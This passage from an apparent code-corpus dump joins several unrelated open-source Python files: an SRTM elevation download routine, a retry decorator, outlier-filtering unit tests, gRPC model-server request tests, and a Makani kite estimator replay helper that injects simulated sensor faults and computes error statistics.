for latitude in range(latmin, min(latmax, 0)):
for longitude in range(lonmin, min(lonmax, 0)):
georef = "S%02gW%03g" % (-latitude, -longitude)
filelist.append(georef)
for longitude in range(max(lonmin, 0), lonmax + 1):
georef = "S%02gE%03g" % (-latitude, longitude)
filelist.append(georef)
for latitude in range(max(0, latmin), latmax + 1):
for longitude in range(lonmin, min(lonmax, 0)):
georef = "N%02gW%03g" % (latitude, -longitude)
filelist.append(georef)
for longitude in range(max(lonmin, 0), lonmax + 1):
georef = "N%02gE%03g" % (latitude, longitude)
filelist.append(georef)
filelist = [f"{f}.SRTMGL{resolution}.hgt.zip" for f in filelist]
wrl_data_path = util.get_wradlib_data_path()
srtm_path = os.path.join(wrl_data_path, "geo")
if not os.path.exists(srtm_path):
os.makedirs(srtm_path)
demlist = []
for filename in filelist:
path = os.path.join(srtm_path, filename)
if not os.path.exists(path):
download_srtm(filename, path, resolution)
demlist.append(path)
demlist = [gdal.Open(d) for d in demlist]
if not merge:
return demlist
dem = gdal.Warp("", demlist, format="MEM")
return dem
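# Usage sketch (requires the wradlib data path and NASA Earthdata credentials
# to be configured via environment variables; the extent values are
# illustrative):
#   dem = get_srtm([6.0, 8.0, 50.0, 52.0], resolution=3)
#   elevation = dem.ReadAsArray()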
|
itchatmp/utils.py | yf-ftd/itchatmp | 1,504 | 12685046 | import time, json
import functools, logging, traceback
from weakref import ref
logger = logging.getLogger('itchatmp')
def retry(n=3, waitTime=3):
def _retry(fn):
@functools.wraps(fn)
def __retry(*args, **kwargs):
for i in range(n):
try:
return fn(*args, **kwargs)
except Exception as e:
logger.debug('%s failed. Count: %s. Info: %r' %
(fn.__name__, i + 1, e))
if i + 1 == n:
logger.debug('%s failed. Reach max retry' %
fn.__name__)
time.sleep(waitTime)
return __retry
return _retry
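# Usage sketch (the decorated function below is illustrative):
#   @retry(n=3, waitTime=3)
#   def request_token(url):
#       ...
# Each call is attempted up to `n` times, sleeping `waitTime` seconds after a
# failure; if every attempt raises, the wrapper returns None.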
def encode_send_dict(d):
try:
return json.dumps(d).encode('utf8'). \
decode('unicode-escape').encode('utf8')
except (UnicodeDecodeError, UnicodeEncodeError):
return
class CoreMixin(object):
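    # Holds only a weak reference to the owning core object, so mixin
    # instances do not keep the core alive; `core` evaluates to None once the
    # core has been garbage collected (or was never set).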
def __init__(self, core):
self.core = core
@property
def core(self):
return getattr(self, '_core', lambda: None)()
@core.setter
def core(self, v):
self._core = ref(v)
|
tests/tests_core/test_outliers.py | andompesta/expan | 320 | 12685052 | from __future__ import division
from expan.core.experiment import Experiment, _choose_threshold_type
import pandas as pd
import numpy as np
def test_choose_threshold_type_upper():
data = np.array([1, 2, 3, np.nan])
assert _choose_threshold_type(data) == 'upper'
def test_choose_threshold_type_upper_zero():
data = np.array([0, 1, 2, 3, np.nan])
assert _choose_threshold_type(data) == 'upper'
def test_choose_threshold_type_lower():
data = np.array([-3, -2, -1, np.nan])
assert _choose_threshold_type(data) == 'lower'
def test_choose_threshold_type_lower_zero():
data = np.array([-3, -2, -1, 0, np.nan])
assert _choose_threshold_type(data) == 'lower'
def test_choose_threshold_type_two_sided():
data = np.array([-3, -2, -1, 0, 1, 2, 3, np.nan])
assert _choose_threshold_type(data) == 'two-sided'
def test_quantile_filtering_upper_old():
exp = Experiment({})
data = np.array([0,0,1,2]) / np.array([0,0,1,1])
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('upper', 90.0)})
assert flags.tolist() == [False, False, False, True]
def test_quantile_filtering_lower_old():
exp = Experiment({})
data = np.array([0,0,1,2]) / np.array([0,0,1,1])
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('lower', 10.)})
assert flags.tolist() == [False, False, True, False]
def test_quantile_filtering_upper():
exp = Experiment({})
data = np.array([0.0]*2 + list(range(10))) / np.array([0.0]*2 + [1.0]*10)
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('upper', 90.0)})
assert flags.tolist() == [False]*11 + [True]
def test_quantile_filtering_lower():
exp = Experiment({})
data = np.array([0.0]*2 + list(range(10))) / np.array([0.0]*2 + [1.0]*10)
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('lower', 50.0)})
print(flags.tolist())
assert flags.tolist() == [False]*2 + [True]*5 + [False]*5
def test_quantile_filtering_two_sided():
exp = Experiment({})
df = pd.DataFrame.from_dict({'earnings' : list(range(10))})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('two-sided', 80.0)})
results = flags.tolist()
assert results == [True] + [False]*8 + [True]
def test_quantile_filtering_two_sided_asym():
exp = Experiment({})
data = list(range(-8,0)) + list(range(16))
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'],
{'earnings': ('two-sided-asym', 50.0)})
results = flags.tolist()
assert results == [True]*2 + [False]*18 + [True]*4
|
moya/template/__init__.py | moyaproject/moya | 129 | 12685075 | from __future__ import absolute_import
from .enginebase import TemplateEngine
from .moyatemplates import Template
from .environment import Environment
# Touch the imported names so linters don't report the re-exports as unused.
TemplateEngine
Template
Environment
|
client/python/lib/tests/test_grpc_requests.py | Xaenalt/model_server | 234 | 12685099 | #
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from tensorflow.core.framework.tensor_pb2 import TensorProto
from tensorflow_serving.apis.get_model_metadata_pb2 import GetModelMetadataRequest
from tensorflow_serving.apis.get_model_status_pb2 import GetModelStatusRequest
from ovmsclient.tfs_compat.grpc.requests import (GrpcModelMetadataRequest, GrpcPredictRequest,
_check_model_spec, make_metadata_request,
make_predict_request, make_status_request,
GrpcModelStatusRequest)
from config import (MODEL_SPEC_INVALID, MODEL_SPEC_VALID,
PREDICT_REQUEST_INVALID_INPUTS, PREDICT_REQUEST_VALID)
from tensorflow_serving.apis.predict_pb2 import PredictRequest
@pytest.mark.parametrize("name, version", MODEL_SPEC_VALID)
def test_check_model_spec_valid(name, version):
_check_model_spec(name, version)
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_check_model_spec_invalid(name, version, expected_exception, expected_message):
with pytest.raises(expected_exception) as e_info:
_check_model_spec(name, version)
assert str(e_info.value) == expected_message
@pytest.mark.parametrize("name, version", MODEL_SPEC_VALID)
def test_make_status_request_valid(mocker, name, version):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec')
model_status_request = make_status_request(name, version)
mock_method.assert_called_once()
assert isinstance(model_status_request, GrpcModelStatusRequest)
assert model_status_request.model_version == version
assert model_status_request.model_name == name
assert isinstance(model_status_request.raw_request, GetModelStatusRequest)
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_make_status_request_invalid(mocker, name, version, expected_exception, expected_message):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec',
side_effect=expected_exception(expected_message))
with pytest.raises(expected_exception) as e_info:
make_status_request(name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
@pytest.mark.parametrize("name, version", MODEL_SPEC_VALID)
def test_make_metadata_request_valid(mocker, name, version):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec')
model_metadata_request = make_metadata_request(name, version)
mock_method.assert_called_once()
assert isinstance(model_metadata_request, GrpcModelMetadataRequest)
assert model_metadata_request.model_version == version
assert model_metadata_request.model_name == name
assert isinstance(model_metadata_request.raw_request, GetModelMetadataRequest)
assert len(model_metadata_request.raw_request.metadata_field) == 1
assert model_metadata_request.raw_request.metadata_field[0] == 'signature_def'
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_make_metadata_request_invalid(mocker, name, version, expected_exception, expected_message):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec',
side_effect=expected_exception(expected_message))
with pytest.raises(expected_exception) as e_info:
make_metadata_request(name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
@pytest.mark.parametrize("inputs, expected_proto, name, version", PREDICT_REQUEST_VALID)
def test_make_predict_request_valid(inputs, expected_proto, name, version):
model_predict_request = make_predict_request(inputs, name, version)
raw_predict_request = model_predict_request.raw_request
assert isinstance(model_predict_request, GrpcPredictRequest)
assert model_predict_request.model_name == name
assert model_predict_request.model_version == version
assert model_predict_request.inputs == inputs
assert isinstance(raw_predict_request, PredictRequest)
assert raw_predict_request.model_spec.name == name
assert raw_predict_request.model_spec.version.value == version
assert len(inputs.keys()) == len(list(raw_predict_request.inputs.keys()))
for key, value in inputs.items():
assert isinstance(raw_predict_request.inputs[key], TensorProto)
if isinstance(value, TensorProto):
assert value == raw_predict_request.inputs[key]
else:
assert (raw_predict_request.inputs[key].__getattribute__(expected_proto[key]['field'])
== expected_proto[key]['value'])
assert raw_predict_request.inputs[key].tensor_shape == expected_proto[key]['shape']
assert raw_predict_request.inputs[key].dtype == expected_proto[key]['dtype']
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_make_predict_request_invalid_model_spec(mocker, name, version,
expected_exception, expected_message):
inputs = {
"input": [1, 2, 3]
}
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec',
side_effect=expected_exception(expected_message))
with pytest.raises(expected_exception) as e_info:
make_predict_request(inputs, name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
@pytest.mark.causes_deprecation_warning
@pytest.mark.parametrize("""inputs, name, version,
expected_exception, expected_message""", PREDICT_REQUEST_INVALID_INPUTS)
def test_make_predict_request_invalid_inputs(mocker, inputs, name, version,
expected_exception, expected_message):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec')
with pytest.raises(expected_exception) as e_info:
make_predict_request(inputs, name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
|
analysis/control/replay/estimator_helper.py | leozz37/makani | 1,178 | 12685103 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module abstracts the ctypes EstimatorReplay interface for python."""
import copy
import ctypes
import re
import sys
import gflags
from makani.analysis.control.replay import estimator_replay as replay
from makani.control import control_types
import numpy as np
import scipy.io as sio
def LoadMessages(filename,
path='/messages/kAioNodeControllerA/kMessageTypeControlDebug',
flight=None):
"""Load ControlTelemetry messages for reprocessing the estimator.
Args:
filename: A string describing the full path to the HDF5 kite log file.
path: A string describing the HDF5 message path.
flight: A string describing the flight name (e.g., rpx02) or None.
Returns:
A ctypes array of ControlTelemetry messages.
"""
num_messages = replay.H5GetNumMessages(filename, path)
messages = (replay.ControlTelemetry * num_messages)()
replay.H5GetControlTelemetryMessages(filename, path, flight, num_messages,
messages)
return messages
class Estimator(object):
"""Python interface to EstimatorReplay."""
def __init__(self, name=None):
self.name = name
self._params = copy.deepcopy(replay.GetControlParams().contents.estimator)
self._fault_subsystems = set()
self._outputs = []
self.Reset()
def _SetParamByPath(self, params, path, value):
p = path.split('.', 1)
if len(p) == 1 and hasattr(params, p[0]):
setattr(params, p[0], value)
elif len(p) > 1 and hasattr(params, p[0]):
self._SetParamByPath(getattr(params, p[0]), p[1], value)
else:
raise ValueError('Invalid parameter path: ' + path)
def UpdateParam(self, path, value):
"""Update a parameter in EstimatorParams.
Args:
path: A string describing the dot path to the parameter.
value: A numerical value to assign.
"""
self._SetParamByPath(self._params, path, value)
def UpdateParams(self, params):
"""Update multiple parameters in EstimatorParams.
Args:
params: A dict mapping the parameter dot path to the assignment value.
"""
for k, v in params.iteritems():
self.UpdateParam(k, v)
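  # Usage sketch (the dot path below is illustrative; valid paths follow the
  # nested field names of EstimatorParams):
  #   est = Estimator('Tuned')
  #   est.UpdateParams({'nav.position_filter.sigma_vel': 0.1})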
def SaturateIndices(self, messages, first_index=0, last_index=None):
"""Ensure message indices are within the bounds of the messages array.
Args:
messages: A ctypes array of ControlTelemetry messages.
first_index: An integer describing the first index in the messages array.
last_index: An integer describing the last index in the messages array.
Returns:
Tuple (first_index, last_index), where first_index and last_index are on
interval [0, num_messages - 1].
"""
num_messages = len(messages)
if last_index is None:
last_index = num_messages - 1
first_index = max(0, min(first_index, num_messages - 1))
last_index = max(0, min(last_index, num_messages - 1))
return first_index, last_index
def Reset(self):
"""Reinitialize the estimator."""
self._outputs = []
self.ResetState(replay.FlightMode(), replay.EstimatorState())
replay.EstimatorReplayInit(ctypes.byref(self._params),
ctypes.byref(self._flight_mode),
ctypes.byref(self._state))
def ResetState(self, flight_mode, state):
"""Reset the estimator state.
Args:
flight_mode: A ctypes FlightMode enum value.
state: A ctypes EstimatorState structure.
"""
self._flight_mode = copy.deepcopy(flight_mode)
self._state = copy.deepcopy(state)
def ResetMessages(self, original, first_index, last_index, messages):
"""Reset the fault state of messages on interval [first_index, last_index].
Args:
original: A ctypes array of unmodified ControlTelemetry messages.
first_index: An integer describing the first index in the messages array.
last_index: An integer describing the last index in the messages array.
messages: A ctypes array of modified ControlTelemetry messages. This
function updates interval [first_index, last_index].
"""
first_index, last_index = self.SaturateIndices(original, first_index,
last_index)
# Reset all faults in all subsystems back to their original value.
subsystems = range(control_types.kNumSubsystems)
labels = self._GetSubsystemLabelsArray(subsystems)
replay.ClearControlTelemetryFaults(first_index, last_index, original,
len(labels), labels, 0xFFFFFFFF,
messages)
# Set all possible faults in selected subsystems.
set_fault_mask = 0xFFFFFFFF
labels = self._GetSubsystemLabelsArray(self._fault_subsystems)
replay.SetControlTelemetryFaults(first_index, last_index, len(labels),
labels, set_fault_mask, messages)
def _SubsystemsParameterToSet(self, subsystems):
"""Convert subsystems parameters to a set."""
if not isinstance(subsystems, (set, list)):
subsystems = [subsystems]
return set(subsystems)
def _GetSubsystemLabelsArray(self, subsystems):
"""Translate a list of subsystems to a ctypes SubsystemLabel array."""
subsystems = self._SubsystemsParameterToSet(subsystems)
labels = (replay.SubsystemLabel * len(subsystems))()
for i, subsys in enumerate(subsystems):
labels[i] = subsys
return labels
def ClearFaults(self, subsystems):
"""Clear faults for a list of subsystems."""
subsystems = self._SubsystemsParameterToSet(subsystems)
self._fault_subsystems -= subsystems
def ClearAllFaults(self):
"""Clear all faults."""
self.ClearFaults(range(control_types.kNumSubsystems))
def SetFaults(self, subsystems):
"""Set faults for a list of subsystems."""
subsystems = self._SubsystemsParameterToSet(subsystems)
self._fault_subsystems |= subsystems
def SetAllFaults(self):
"""Set faults in all controller subsystems."""
self.SetFaults(range(control_types.kNumSubsystems))
def ClearImuAccelGyroFaults(self):
"""Clear IMU accelerometer and gyro subsystem faults."""
subsystems = [control_types.kSubsysImuAAcc,
control_types.kSubsysImuAGyro,
control_types.kSubsysImuBAcc,
control_types.kSubsysImuBGyro,
control_types.kSubsysImuCAcc,
control_types.kSubsysImuCGyro]
self.ClearFaults(subsystems)
def SetGpsCrosswindFaults(self):
"""Set faults in the GPS subsystem for the crosswind antenna."""
subsystems = [control_types.kSubsysWingGpsCrosswindPos,
control_types.kSubsysWingGpsCrosswindVel]
self.SetFaults(subsystems)
def SetGpsHoverFaults(self):
"""Set faults in the GPS subsystem for the hover antenna."""
subsystems = [control_types.kSubsysWingGpsHoverPos,
control_types.kSubsysWingGpsHoverVel]
self.SetFaults(subsystems)
def SetGpsPortFaults(self):
"""Set faults in the GPS subsystem for the port wingtip antenna."""
subsystems = [control_types.kSubsysWingGpsPortPos,
control_types.kSubsysWingGpsPortVel]
self.SetFaults(subsystems)
def SetGpsStarboardFaults(self):
"""Set faults in the GPS subsystem for the starboard wingtip antenna."""
subsystems = [control_types.kSubsysWingGpsStarPos,
control_types.kSubsysWingGpsStarVel]
self.SetFaults(subsystems)
def SetGpsFaults(self):
"""Set faults in all wing GPS subsystems."""
self.SetGpsCrosswindFaults()
self.SetGpsHoverFaults()
self.SetGpsPortFaults()
self.SetGpsStarboardFaults()
def SetGsGpsFaults(self):
"""Set faults in the ground station GPS subsystem."""
subsystems = [control_types.kSubsysGsCompass,
control_types.kSubsysGsGpsPos,
control_types.kSubsysGsGpsVel]
self.SetFaults(subsystems)
def SetGsgFaults(self):
"""Set faults in the ground side gimble subsystems."""
subsystems = [control_types.kSubsysGsgAAzi,
control_types.kSubsysGsgAEle,
control_types.kSubsysGsgBAzi,
control_types.kSubsysGsgBEle]
self.SetFaults(subsystems)
def SetGlasFaults(self):
"""Set faults in the ground line angle sensing subsystems."""
self.SetGsgFaults()
self.SetLevelwindFaults()
self.SetLoadcellFaults()
self.SetPerchAziFaults()
def SetLevelwindFaults(self):
"""Set faults in the levelwind subsystems."""
subsystems = [control_types.kSubsysLevelwindEleA,
control_types.kSubsysLevelwindEleB]
self.SetFaults(subsystems)
def SetLoadcellFaults(self):
"""Set faults in the loadcell subsystems."""
subsystems = [control_types.kSubsysLoadcellSensorPort0,
control_types.kSubsysLoadcellSensorPort1,
control_types.kSubsysLoadcellSensorStarboard0,
control_types.kSubsysLoadcellSensorStarboard1]
self.SetFaults(subsystems)
def SetMagFaults(self):
"""Set faults in the magnetometer subsystems."""
subsystems = [control_types.kSubsysImuAMag,
control_types.kSubsysImuBMag,
control_types.kSubsysImuCMag]
self.SetFaults(subsystems)
def SetPerchAziFaults(self):
"""Set faults in the perch azimuth subsystems."""
subsystems = [control_types.kSubsysPerchAziA,
control_types.kSubsysPerchAziB]
self.SetFaults(subsystems)
def SetPitotFaults(self):
"""Set faults in the pitot tube subsystems."""
subsystems = [control_types.kSubsysPitotSensorHighSpeedAlpha,
control_types.kSubsysPitotSensorHighSpeedBeta,
control_types.kSubsysPitotSensorHighSpeedDynamic,
control_types.kSubsysPitotSensorHighSpeedStatic,
control_types.kSubsysPitotSensorLowSpeedAlpha,
control_types.kSubsysPitotSensorLowSpeedBeta,
control_types.kSubsysPitotSensorLowSpeedDynamic,
control_types.kSubsysPitotSensorLowSpeedStatic]
self.SetFaults(subsystems)
def SetWeatherFaults(self):
"""Set faults in the weather subsystems."""
subsystems = [control_types.kSubsysWeather]
self.SetFaults(subsystems)
def SetWindFaults(self):
"""Set faults in the wind subsystems."""
subsystems = [control_types.kSubsysWindSensor]
self.SetFaults(subsystems)
def Iterate(self, messages, first_index, last_index, states, estimates):
"""Iterate the state estimate from first_index to last_index.
Args:
messages: A ctypes array of ControlTelemetry messages to process.
first_index: An integer describing the first index to process.
last_index: An integer describing the last index to process.
states: A ctypes array of EstimatorStates output states, equal in length
to the messages array.
estimates: A ctypes array of StateEstimate output estimates, equal in
length to the messages array.
"""
assert first_index <= last_index
first_index, last_index = self.SaturateIndices(messages, first_index,
last_index)
replay.EstimatorReplayIterateArray(ctypes.byref(self._params),
first_index, last_index, messages,
ctypes.byref(self._flight_mode),
ctypes.byref(self._state), states,
estimates)
def IterateSegment(self, flight_mode_z1, state_z1, first_index, last_index,
messages, modified_messages, states, estimates):
self.ResetState(flight_mode_z1, state_z1)
self.ResetMessages(messages, first_index, last_index, modified_messages)
self.Iterate(modified_messages, first_index, last_index, states, estimates)
def ComputeOutputs(self, messages, first_index, last_index, states,
estimates):
"""Compute estimator outputs from first_index to last_index.
Note that this function also stores the outputs in an array for each
interval. Use property 'output' to access this array.
Args:
messages: A ctypes array of ControlTelemetry messages to process.
first_index: An integer describing the first index to process.
last_index: An integer describing the last index to process.
states: A ctypes array of EstimatorStates output states, equal in length
to the messages array.
estimates: A ctypes array of StateEstimate output estimates, equal in
length to the messages array.
Returns:
An EstimatorOutput object.
"""
output = EstimatorOutput(self.initializing, messages, states, estimates,
first_index, last_index)
self._outputs.append(output)
return output
def ComputeErrorMetrics(self, references):
return [ErrorMetrics(o, r) for o, r in zip(self._outputs, references)]
@property
def params(self):
return self._params
@property
def flight_mode(self):
return copy.deepcopy(self._flight_mode)
@property
def state(self):
return copy.deepcopy(self._state)
@property
def initializing(self):
return replay.GetEstimatorTelemetry().contents.initializing
@property
def outputs(self):
return self._outputs
@property
def output_interval(self):
return max([o.segment_time for o in self._outputs])
class EstimatorMetrics(object):
"""Base class to store estimator outputs over a given interval."""
def __init__(self, messages, first_index, last_index):
self._first_index = first_index
self._last_index = last_index
self._indices = range(first_index, last_index + 1)
self._num_messages = last_index - first_index + 1
self._valid = np.zeros(self._num_messages, dtype=bool)
self._time = np.array([messages[i].time for i in self._indices])
self._position = np.zeros((self._num_messages, 3))
self._velocity = np.zeros((self._num_messages, 3))
self._attitude = np.zeros((self._num_messages, 3, 3))
self._gyro_bias = np.zeros((self._num_messages, 3))
self._flight_modes = np.unique([messages[i].flight_mode
for i in self._indices])
def SetValid(self, valid):
if isinstance(valid, bool):
self._valid = valid * np.ones(self._num_messages, dtype=bool)
else:
self._valid = valid
def SetPosition(self, position):
self._position = position
def SetVelocity(self, velocity):
self._velocity = velocity
def SetAttitude(self, attitude):
self._attitude = attitude
def SetGyroBias(self, gyro_bias):
self._gyro_bias = gyro_bias
@property
def first_index(self):
return self._first_index
@property
def last_index(self):
return self._last_index
@property
def indices(self):
return self._indices
@property
def num_messages(self):
return self._num_messages
@property
def segment_time(self):
return self._num_messages * replay.GetSystemParams().contents.ts
@property
def valid(self):
return self._valid
@property
def position(self):
return self._position
@property
def velocity(self):
return self._velocity
@property
def attitude(self):
return self._attitude
@property
def gyro_bias(self):
return self._gyro_bias
@property
def time(self):
return self._time
@property
def flight_modes(self):
return self._flight_modes
class EstimatorOutput(EstimatorMetrics):
"""Store the estimator outputs."""
def __init__(self, initializing, messages, states, estimates, first_index,
last_index):
super(EstimatorOutput, self).__init__(messages, first_index, last_index)
self.SetPosition(self.ExtractPositionEstimate(estimates))
self.SetVelocity(self.ExtractVelocityEstimate(estimates))
self.SetAttitude(self.ExtractAttitudeEstimate(estimates))
self.SetGyroBias(self.ExtractGyroBiasEstimate(states))
self.SetValid(not initializing)
def ExtractPositionEstimate(self, estimates):
"""Extract the estimator position estimates."""
position = np.zeros((self.num_messages, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
position[i, 0] = estimates[m].Xg.x
position[i, 1] = estimates[m].Xg.y
position[i, 2] = estimates[m].Xg.z
return position
def ExtractVelocityEstimate(self, estimates):
"""Extract the estimator velocity estimates."""
velocity = np.zeros((self.num_messages, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
velocity[i, 0] = estimates[m].Vg.x
velocity[i, 1] = estimates[m].Vg.y
velocity[i, 2] = estimates[m].Vg.z
return velocity
def ExtractAttitudeEstimate(self, estimates):
"""Extract the estimator attitude estimates."""
attitude = np.zeros((self.num_messages, 3, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
for j in range(3):
for k in range(3):
attitude[i, j, k] = estimates[m].dcm_g2b.d[j][k]
return attitude
def ExtractGyroBiasEstimate(self, states):
"""Extract the estimator gyro bias estimates."""
gyro_bias = np.zeros((self.num_messages, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
imu = states[m].nav.last_used_imu
gyro_bias[i, 0] = states[m].nav.attitude[imu].filter.gyro_bias.x
gyro_bias[i, 1] = states[m].nav.attitude[imu].filter.gyro_bias.y
gyro_bias[i, 2] = states[m].nav.attitude[imu].filter.gyro_bias.z
return gyro_bias
class ErrorMetrics(object):
"""Compute error between two EstimatorMetrics objects."""
def __init__(self, a, b):
"""Instantiate an ErrorMetrics object.
Args:
a: An EstimatorMetrics object.
b: An EstimatorMetrics object.
"""
assert a.first_index == b.first_index
assert a.last_index == b.last_index
# Compute error over valid trajectory indices.
ii = np.where(a.valid)[0]
ii = ii[b.valid[ii]]
# Compute position error.
self._position_error = np.linalg.norm(a.position[ii] - b.position[ii],
axis=1)
# Compute velocity error.
self._velocity_error = np.linalg.norm(a.velocity[ii] - b.velocity[ii],
axis=1)
# Compute attitude error as the norm of the small angle rotation vector.
attitude_error = np.zeros((len(a.attitude), 3))
for i in ii:
dcm_a = np.matrix(a.attitude[i])
dcm_b = np.matrix(b.attitude[i])
delta = dcm_b.transpose() * dcm_a
attitude_error[i, 0] = -delta[1, 2]
attitude_error[i, 1] = delta[0, 2]
attitude_error[i, 2] = -delta[0, 1]
self._attitude_error = np.linalg.norm(attitude_error[ii], axis=1)
# Compute gyro bias error.
self._gyro_bias_error = np.linalg.norm(a.gyro_bias[ii] - b.gyro_bias[ii],
axis=1)
# Store time and flight modes. These quantities should be common.
self._time = a.time[ii]
self._flight_modes = a.flight_modes
@property
def flight_modes(self):
return self._flight_modes
@property
def time(self):
return self._time
@property
def position_error(self):
return self._position_error
@property
def position_mae(self):
return np.sum(np.abs(self._position_error)) / len(self._position_error)
@property
def position_maxe(self):
return np.max(self._position_error)
@property
def position_rmse(self):
return np.std(self._position_error)
@property
def velocity_error(self):
return self._velocity_error
@property
def velocity_mae(self):
return np.sum(np.abs(self._velocity_error)) / len(self._velocity_error)
@property
def velocity_maxe(self):
return np.max(self._velocity_error)
@property
def velocity_rmse(self):
return np.std(self._velocity_error)
@property
def attitude_error(self):
return self._attitude_error
@property
def attitude_mae(self):
return np.sum(np.abs(self._attitude_error)) / len(self._attitude_error)
@property
def attitude_maxe(self):
return np.max(self._attitude_error)
@property
def attitude_rmse(self):
return np.std(self._attitude_error)
@property
def gyro_bias_error(self):
return self._gyro_bias_error
@property
def gyro_bias_mae(self):
return np.sum(np.abs(self._gyro_bias_error)) / len(self._gyro_bias_error)
@property
def gyro_bias_maxe(self):
return np.max(self._gyro_bias_error)
@property
def gyro_bias_rmse(self):
return np.std(self._gyro_bias_error)
def ComputeCdf(error_metrics, attribute):
x = np.sort(np.array([getattr(e, attribute) for e in error_metrics
if len(e.time)]))
y = np.linspace(0.0, 1.0, len(x))
return x, y
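# The arrays returned by ComputeCdf form an empirical CDF: x holds the sorted
# per-segment error statistic and y[i] is (approximately) the fraction of
# segments whose statistic is <= x[i]. Plotting sketch (matplotlib is not a
# dependency of this module):
#   x, y = ComputeCdf(error_metrics, 'position_maxe')
#   plt.plot(x, y)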
def ComputeEstimatorErrorCdfs(ref_estimator, test_estimators, t0=-float('inf'),
t1=float('inf')):
"""Compute error CDFs by comparing each test estimator against the reference.
Args:
ref_estimator: An Estimator object.
test_estimators: A list of Estimator objects.
t0: A float describing the minimum time to consider.
t1: A float describing the maximum time to consider.
Returns:
A dict that maps the test estimator name to its error metric CDFs.
"""
output = {}
for est in test_estimators:
error_metrics = est.ComputeErrorMetrics(ref_estimator.outputs)
error_metrics = [o for o in error_metrics
if o.time.size > 0 and t0 <= np.min(o.time)
and np.max(o.time) <= t1]
pos_maxe, prob = ComputeCdf(error_metrics, 'position_maxe')
pos_mae, _ = ComputeCdf(error_metrics, 'position_mae')
pos_rmse, _ = ComputeCdf(error_metrics, 'position_rmse')
vel_maxe, _ = ComputeCdf(error_metrics, 'velocity_maxe')
vel_mae, _ = ComputeCdf(error_metrics, 'velocity_mae')
vel_rmse, _ = ComputeCdf(error_metrics, 'velocity_rmse')
att_maxe, _ = ComputeCdf(error_metrics, 'attitude_maxe')
att_mae, _ = ComputeCdf(error_metrics, 'attitude_mae')
att_rmse, _ = ComputeCdf(error_metrics, 'attitude_rmse')
bg_maxe, _ = ComputeCdf(error_metrics, 'gyro_bias_maxe')
bg_mae, _ = ComputeCdf(error_metrics, 'gyro_bias_mae')
bg_rmse, _ = ComputeCdf(error_metrics, 'gyro_bias_rmse')
output[est.name] = {
'name': est.name,
'prob': prob,
'pos_maxe': pos_maxe,
'pos_mae': pos_mae,
'pos_rmse': pos_rmse,
'vel_maxe': vel_maxe,
'vel_mae': vel_mae,
'vel_rmse': vel_rmse,
'att_maxe': att_maxe,
'att_mae': att_mae,
'att_rmse': att_rmse,
'bg_maxe': bg_maxe,
'bg_mae': bg_mae,
'bg_rmse': bg_rmse,
}
return output
def SaveEstimatorErrorCdfsToMatFile(output, filename):
# Replace invalid variable name characters with an underscore.
mat = {re.sub(r'[^(A-Za-z0-9_)]', r'_', k): v for k, v in output.iteritems()}
sio.savemat(filename, mat)
def ProcessEstimatorSegments(messages, increment, seg_length, ref_estimator,
test_estimators):
"""Periodically process test estimator segments from the reference estimator.
This function helps understand the relative performance between two or more
estimator configurations. It iterates the reference estimator forward in steps
of 'increment' messages. At each increment, it iterates all estimators for
'seg_length' messages from the current reference estimator state. Each
estimator then stores its output trajectory within its own object structure.
Args:
messages: A ctypes array of ControlTelemetry messages.
increment: An integer number of messages to iterate between each segment.
seg_length: An integer number of messages to iterate for each segment.
ref_estimator: An Estimator object.
test_estimators: A list of Estimator objects.
"""
assert increment > 0
assert seg_length > 0
# Allocate memory.
num_messages = len(messages)
states = (replay.EstimatorState * num_messages)()
estimates = (replay.StateEstimate * num_messages)()
modified_messages = copy.deepcopy(messages)
num_segments = (num_messages + increment - 1) / increment
# Set initial state and clear previous outputs.
ref_estimator.Reset()
for est in test_estimators:
est.Reset()
first_index_z1 = 0
flight_mode_z1 = ref_estimator.flight_mode
state_z1 = ref_estimator.state
# Iterate for each increment.
for segment in range(num_segments):
first_index = segment * increment
last_index = min(segment * increment + seg_length, num_messages) - 1
